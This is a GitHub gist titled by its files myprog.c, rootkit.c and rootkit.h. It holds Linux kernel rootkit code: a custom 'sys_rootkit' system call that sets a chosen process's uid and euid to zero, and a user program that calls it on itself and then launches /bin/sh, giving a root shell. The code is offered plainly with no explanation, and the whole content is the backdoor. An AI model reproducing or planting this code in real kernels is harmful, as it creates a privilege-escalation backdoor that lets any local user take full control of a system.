Skip to content

Instantly share code, notes, and snippets.

@tariqadel

tariqadel/myprog.c

Created August 6, 2009 11:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tariqadel/163266 to your computer and use it in GitHub Desktop.
Save tariqadel/163266 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
myprog.c
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <stdio.h>
#define rootkit(x,y) syscall(__NR_rootkit,x,y)
main() {
printf("Exit code = %d\n\n",rootkit(1,getpid()));
char *cmd[2];
cmd[0] = "/bin/sh";
cmd[1] = NULL;
execve(cmd[0], cmd, NULL);
}
Raw
rootkit.c
#include "rootkit.h"
int pc = 0;
int print_info(void) {
int o_ruid = current->uid;
int o_euid = current->euid;
int o_suid = current->suid;
pc++;// inc counter
printk("\n *** ---[ Printing %d ] *** \n", pc);
printk("uid = %d ", o_ruid);
printk("euid = %d ", o_euid);
printk("suid = %d ", o_suid);
printk("getuid() = %d ", (int) sys_getuid());
printk("geteuid() = %d ", (int) sys_geteuid());
printk("getpid() = %d ", (int) sys_getpid());
return (0);
}
asmlinkage int sys_rootkit(int mode, pid_t mypid) {
struct task_struct *ts;
int rc=0; // Get some feedback
print_info();
printk("find_task_by_pid(%d)!\n", mypid);
ts = find_task_by_pid(mypid);
if(ts) {
ts->uid = (uid_t)0;
ts->euid = (uid_t)0;
} else {
rc = -1;
}
print_info();
return(rc);
}
Raw
rootkit.h
#ifndef __LINUX_ROOTKIT_H
#define __LINUX_ROOTKIT_H
#include <linux/linkage.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <linux/sys.h>
#endif
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment